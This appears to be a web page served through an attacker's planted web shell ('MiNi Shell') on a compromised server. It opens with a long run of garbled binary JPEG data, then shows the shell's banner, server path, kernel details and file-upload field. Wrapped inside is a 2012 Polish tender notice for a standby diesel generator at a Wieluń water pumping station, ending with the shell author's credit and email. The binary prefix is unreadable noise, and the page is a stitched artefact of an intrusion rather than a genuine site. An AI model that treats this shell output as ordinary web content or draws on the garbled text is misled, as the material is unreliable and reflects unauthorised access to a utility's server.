JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120531/181876-N-2012.html

<p class="kh_header"><b>Wieluń: Dostawa i montaż agregatu prądotwórczego wraz z infrastrukturą techniczną na hydroforni Stare Sady w Wieluniu.</b><br>
<b>Numer ogłoszenia: 181876 - 2012; data zamieszczenia: 31.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Komunalne Sp. z o.o. , ul. Zamenhofa 17, 98-300 Wieluń, woj. łódzkie, tel. 043 8433115, faks 043 8434217.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.komunalne.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka ze 100% udziałem Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż agregatu prądotwórczego wraz z infrastrukturą techniczną na hydroforni Stare Sady w Wieluniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia

      Przedmiotem  zamówienia jest dostawa na miejsce wraz z rozładunkiem  i montażem fabrycznie nowego agregatu prądotwórczego  o mocy nie mniejszej niż  65 kVA 3 x 230 400V oraz wykonanie robót budowlanych i instalacyjnych umożliwiających pracę urządzenia w ruchu automatycznym po zaniku napięcia w sieci podstawowej dla   hydroforni w osiedlu Stare Sady 46a w Wieluniu. Kod CPV 31122000-7

2.	Wymogi Zamawiającego w zakresie  agregatu prądotwórczego

- agregat prądotwórczy fabrycznie nowy z seryjnej produkcji z roku  2012,
- silnik wysokoprężny chłodzony cieczą,
- paliwo stosowane - olej napędowy,
- agregat stacjonarny, wolnostojący do montażu wewnątrz pomieszczenia hydroforni
- rozruch automatyczny po zaniku napięcia w sieci podstawowej
- wyposażenie agregatu w tablicę kontrolną  umożliwiającą odczyt następujących parametrów elektrycznych:  napięcie i  natężenie prądu w poszczególnych fazach , częstotliwość prądu, oddawaną mocy czynną i bierną , poziom naładowania akumulatorów 
- wyposażenie agregatu w tablicę kontrolną umożliwiającą odczyt parametrów pracy silnika: poziom paliwa , temperatura oleju , temperatura czynnika chłodzącego 
- zbiornik paliwa w ramie  agregatu winien zawierać ilość paliwa umożliwiającą  12 godzin pracy przy obciążeniu znamionowym
- znamionowa moc agregatu - 65kVA52kW z możliwością krótkotrwałego do 15min  przeciążenia o 10%,
- częstotliwość 50Hz, napięcie 3x230400V,
- prądnica trójfazowa synchroniczna, ilość faz 3 + N , typ połączenia biegunów - gwiazda, uzwojenie odporne na środowisko wilgotne i słone, izolacja uzwojenia wirnika i stojana klasa H, zabezpieczenie przed wzrostem temperatury klasa F, mechaniczny stopień ochrony prądnicy IP 21, chłodzenie prądnicy powietrze , system wzbudzania bezszczotkowy, regulacja napięcia elektroniczna AVR, prądnica charakteryzować się ma niskim poziomem zawartości harmonicznych 
- agregat powinien charakteryzować się dużą stabilnością napięcia i częstotliwości niepowodującą zakłóceń pracy zasilanych urządzeń,
- krótki czas osiągania mocy maksymalnie 1 min po podaniu sygnału start,
- moduł ciągłej regulacji obrotów agregatu w zależności od obciążenia,
- wyświetlacz układu sterowania z podświetlaniem nocnym, menu tablicy sterującej w języku polskim,
- agregat powinien posiadać możliwość ręcznego uruchomienia bez obciążenia, 
- agregat wyposażony ma być w kompletną instalację paliwową, smarowania, chłodzenia 
- agregat przeznaczony jest do pracy awaryjnej
- gwarancja wymagana przez Zamawiającego wynosi minimum 60 m-cy 
- w okresie obowiązywania gwarancji Wykonawca zapewni 2 przeglądy w każdym roku bez dodatkowego wynagrodzenia. Zamawiający pokryje jedynie koszty materiałów eksploatacyjnych  filtry , olej , płyn chłodzący
- w przypadku zgłoszenia awarii w okresie gwarancji  Wykonawca jest zobowiązany podjęcie działań  w ciągu 24 godzin od momentu zgłoszenia awarii, i jej usunięcie  w ciągu 48 godzin
- brak możliwości usunięcia awarii  agregatu  w ciągu 4 dni od daty jej zgłoszenia zobowiązuje Wykonawcę  się do podstawienia zastępczego agregatu na czas wykonania naprawy,
-  dostarczenie dokumentacji techniczno - ruchowej zespołu prądotwórczego w języku polskim 
- opracowanie instrukcji eksploatacyjnej i BHP,
- przeprowadzenie szkolenia osób zajmujących się eksploatacją agregatu w zakresie obsługi oraz wystawienie zaświadczeń o ukończeniu szkolenia,
- Wykonawca zapewni paliwo do przeprowadzenia prób pomontażowych , rozruchu i testowania układu SZR ( minimum 4 godziny pracy agregatu przy mocy znamionowej)
- Wykonawca zapewni na dzień odbioru obciążnicę  czynno-indukcyjną dla przeprowadzenia prób o mocy nie mniejszej jak 110% mocy znamionowej agregatu 

3.	Prace budowlane i instalacyjne do wykonania w ramach dostawy i montażu agregatu

- wykonanie fundamentu betonowego pod agregat zgodnie z rysunkiem  udostępnionym przez Zamawiającego w załączeniu.
- wykonanie otworów w ścianach zewnętrznych budynku zgodnie z rysunkiem udostępnionym przez Zamawiającego pod czernię powietrza, wyrzutnię powietrza, instalację spalin w załączeniu.
- wymiana drzwi zewnętrznych do pomieszczenia na drzwi dźwiękochłonne i o klasie odporności ogniowej EI 30 dwuskrzydłowe o wymiarach 210x 207 cm zamek Gerda 
- wykonanie i montaż układu SZR sieć - agregat na ścianie wewnętrznej budynku zgodnie ze schematem udostępnionym przez Zamawiającego w załączeniu.
-  wykonanie linii zasilającej, linii sterowniczej od agregatu do układu SZR - zgodnie z planem instalacji udostępnionym przez Zamawiającego w załączeniu.
- wykonanie linii zasilającej, linii sterowniczej od rozdzielni głównej NN 0,4 kV do układu SZR zgodnie z planem instalacji udostępnionym przez Zamawiającego w załączeniu
- dostawa, montaż, uruchomienie prostownika buforowego wraz z instalacją zasilania akumulatorów agregatu
- wykonanie kompletnej instalacji wentylacji pomieszczenia agregatu wraz z czerpnią i wyrzutnią powietrza, żaluzjami sterowanymi za pomocą siłowników, kanałem wentylacyjnym, tłumikami hałasu, wykonanie instalacji sterowniczych do siłowników zgodnie z rysunkami udostępnionymi przez Zamawiającego  w załączeniu.
- wykonanie kompletnej instalacji odprowadzenia spalin według rysunku udostępnionego przez Zamawiającego  w załączeniu.

4.	Algorytm układu SZR i pracy agregatu

- napięcie z sieci Zakładu Energetycznego - zamknięty wyłącznik Q1
- zanik napięcia w sieci podstawowej:  odmierzany czas t1=15-30 sek , po jego upływie wysłanie sygnału start do agregatu , otwarcie wyłącznika Q1,  odmierzany czas t2=15-45 sek , po jego upływie podanie napięcia z agregatu , zamknięcie wyłącznika Q2
- praca agregatu 
- powrót napięcia w sieci podstawowej : odmierzany czas t3=15-30 sek , otwarcie wyłącznika Q2 , zamknięcie wyłącznika Q1 , podanie sygnału stop do agregatu , odmierzany czas t4=3 min wychłodzenie agregatu , zatrzymanie agregatu.

5.	Dodatkowe obowiązki Wykonawcy

- wykonanie instrukcji współpracy agregatu z siecią i jej uzgodnienie z Zakładem Energetycznym
- montaż modemu GPRS umożliwiającego powiadomienie Zamawiającego o podjęciu pracy przez agregat i jego stanach awaryjnych. Modem powinien przesyłać niżej wymienione informacje: zanik napięcia z sieci energetycznej, stan gotowości agregatu do pracy w trybie automatycznym, praca agregatu, pomiar napięcia i natężenia prądu na poszczególnych fazach, powrót napięcia z sieci energetycznej, koniec pracy agregatu, wysoka temperatura cieczy chłodzącej, niskie ciśnienie oleju w silniku, niski poziom paliwa w zbiorniku, stan naładowania akumulatorów.
Monitoring  ma zostać wpięty do istniejącego systemu monitoringu i wizualizacji GPRS MARGO. Rozbudowę systemu należy zrealizować poprzez naniesienie nowego obiektu na istniejącej mapie synoptycznej poprzez utworzenie dodatkowej zakładki w istniejącym oprogramowaniu na stacji bazowej mieszczącej się na SUW przy ul. Częstochowskiej w Wieluniu. Jednocześnie Zamawiający zastrzega, że istniejący i funkcjonujący system sterowania i monitoringu w oparciu o pakietową transmisję danych GPRS nie może być zmieniony na inny.
               Nie dopuszcza się również możliwości współdziałania dwóch czy więcej 
               odmiennych systemów sterowania i monitoringu z uwagi na koszty przyszłej
eksploatacji obiektów należących do Zamawiającego
- wykonanie dokumentacji powykonawczej wielobranżowej zgodnie z wymogami Prawa Budowlanego  
- przeprowadzenie szkolenia wytypowanych przez Zamawiającego osób w zakresie obsługi i eksploatacji agregatu i układu SZR
- wykonanie pomiarów ochronnych i sprawdzających w branży elektrycznej i sanitarnej : oporność izolacji , skuteczność ochrony przeciwporażeniowej , oporność uziemienia , szczelność instalacji wyrzutu spalin , wydajność wentylacji , pomiar hałasu na zewnątrz budynku.
- przeprowadzenie prób pomontażowych i rozruchu technologicznego

Szczegółowy zakres prac został ujęty w przedmiarze robót udostępnionym przez Zamawiająceg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.12.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie wykonania w ciągu ostatnich 5 lat   co najmniej jednej
Dostawy wraz  z montażem i uruchomieniem o zakresie i charakterze porównywalnym z niniejszym  zamówieniem a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierający następujące dane: wartość dostawy , datę i miejsce wykonania - załącznik nr 5.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie uprawnień, wiedzy, doświadczenia, potencjału technicznego, ekonomicznego  i finansowego do wykonania zadania tj. spełnienie warunków określonych w art. 22 ust. 1 pkt. 1, 2, 3, 4 Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.komunalne.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Komunalne Sp. z o. o., ul. Zamenhofa 17, 98-300 Wieluń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 10:00, miejsce: Sekretariat Zamawiającego, u. Zamenhofa 17, 98-300 Wieluń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com